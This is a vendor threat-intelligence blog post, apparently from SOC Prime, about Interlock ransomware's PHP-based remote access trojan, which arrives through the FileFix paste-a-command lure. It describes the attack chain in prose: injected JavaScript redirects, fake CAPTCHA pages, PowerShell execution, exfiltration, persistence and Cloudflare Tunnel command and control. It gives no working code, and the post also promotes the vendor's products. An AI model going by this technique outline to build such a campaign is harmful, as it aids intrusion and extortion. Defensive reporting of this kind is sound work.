Threat actors operating the Interlock ransomware, known for executing high-impact double-extortion attacks across various global industries, have re-emerged in the cyber threat landscape. Attackers have recently deployed a new PHP-based version of its custom RAT in a large-scale campaign, leveraging a modified ClickFix variant known as FileFix to target organizations across multiple sectors.
Detect Interlock Ransomware Attacks
The 2025 Verizon Data Breach Investigations Report (DBIR) shows that ransomware continues to grow, playing a role in 44% of breaches—up from 32% the year before. With average ransom payments reaching $2 million in 2024, attackers are more motivated than ever. Cybersecurity Ventures warns that by 2031, a ransomware attack could happen every two seconds, making strong and proactive threat detection more important than ever.
Register for the SOC Prime Platform to detect potential threats,, like Interlock ransomware, at the earliest possible stage. The Platform delivers timely threat intelligence and actionable detection content, backed by a complete product suite for AI-powered detection engineering, automated threat hunting, and advanced threat detection. Click the Explore Detections button below to access a curated stack of detection rules specifically designed to help identify and respond to Interlock ransomware activity.
All the rules in the SOC Prime Platform are compatible with multiple SIEM, EDR, and Data Lake solutions and mapped to the MITRE ATT&CK® framework. Additionally, each rule is packed with detailed metadata, including threat intel references, attack timelines, triage recommendations, and more.
Optionally, cyber defenders can apply the broader “Ransomware” tag to access a wider range of detection rules covering ransomware attacks globally.
Additionally, security experts might streamline threat investigation using Uncoder AI, a private IDE & co-pilot for threat-informed detection engineering. Generate detection algorithms from raw threat reports, enable fast IOC sweeps, predict ATT&CK tags, optimize query code with AI tips, and translate it across multiple SIEM, EDR, and Data Lake languages. For instance, cyber defenders can use IOCs from The DFIR Report research to instantly convert them into performance-optimized queries ready to run in a chosen SIEM or EDR environment.
Interlock Ransomware Analysis
The Intelock ransomware group is a relatively new but rapidly evolving threat in the cybercrime landscape. First observed in September 2024, the Interlock ransomware variant has been linked to a series of high-impact, double-extortion attacks targeting organizations across multiple sectors. Victims have included entities in healthcare, technology, and the public sector in the United States, as well as manufacturing firms throughout Europe.
A recent joint analysis by The DFIR Report and Proofpoint reveals that the ransomware group has developed and deployed a new PHP-based variant of its custom Intelock remote access trojan, also known as NodeSnake. While the name reflects its original Node.js foundation, this updated version represents a tactical shift. Since May 2025, the PHP variant has been observed in a widespread campaign linked to the LandUpdate808 threat cluster, also known as KongTuke. Threat actors have used a modified version of the ClickFix malware—dubbed FileFix—to deliver the RAT and execute malicious payloads across a broad range of targeted industries.
FileFix represents an evolution of ClickFix, exploiting a social engineering trick that abuses the Windows File Explorer’s address bar. By luring victims into copying and pasting malicious commands, attackers can achieve code execution without needing traditional file downloads, adding stealth and simplicity to their delivery method.
The campaign begins with compromised websites injected with a single-line JavaScript snippet hidden in the HTML, often without the knowledge of site owners or visitors. This JavaScript code functions as a traffic distribution system (TDS), using IP filtering to redirect users to fake CAPTCHA verification pages. There, victims are tricked into running a PowerShell script, leading to the deployment of the Interlock RAT. Both Node.js and PHP variants have been observed in the wild.
Once deployed, the Interlock RAT begins by performing reconnaissance on the infected system, gathering host information and exfiltrating it in JSON format. The malware also checks its privilege level—determining whether it is running under USER, ADMIN, or SYSTEM rights—and connects to a remote server to fetch and execute additional payloads, typically in EXE or DLL form.
To maintain persistence, the RAT modifies Windows Registry settings. For lateral movement across the network, it leverages Remote Desktop Protocol (RDP) access.
A distinctive feature of NodeSnake is its use of Cloudflare Tunnel subdomains to conceal the true location of its command-and-control (C2) infrastructure. Even if the tunnel is disabled or taken down, the malware is designed to maintain contact through hard-coded fallback IP addresses embedded in the code.
The latest version of Interlock ransomware stands out from the earlier Node.js variant by using PHP, a commonly used web scripting language, to penetrate and maintain access to victim environments. This shift reflects the continual evolution of the group’s tooling and growing operational complexity, demanding swift and adaptive responses from defenders. By relying on SOC Prime’s top expertise and AI at the core of its complete product suite that fuses advanced detection engineering, automated capabilities, and AI-native threat intelligence, organizations in diverse industry sectors can future-proof their defenses at scale.
The post Interlock Ransomware Detection: Adversaries Deploy a Novel PHP-Based RAT Variant via FileFix appeared first on SOC Prime.
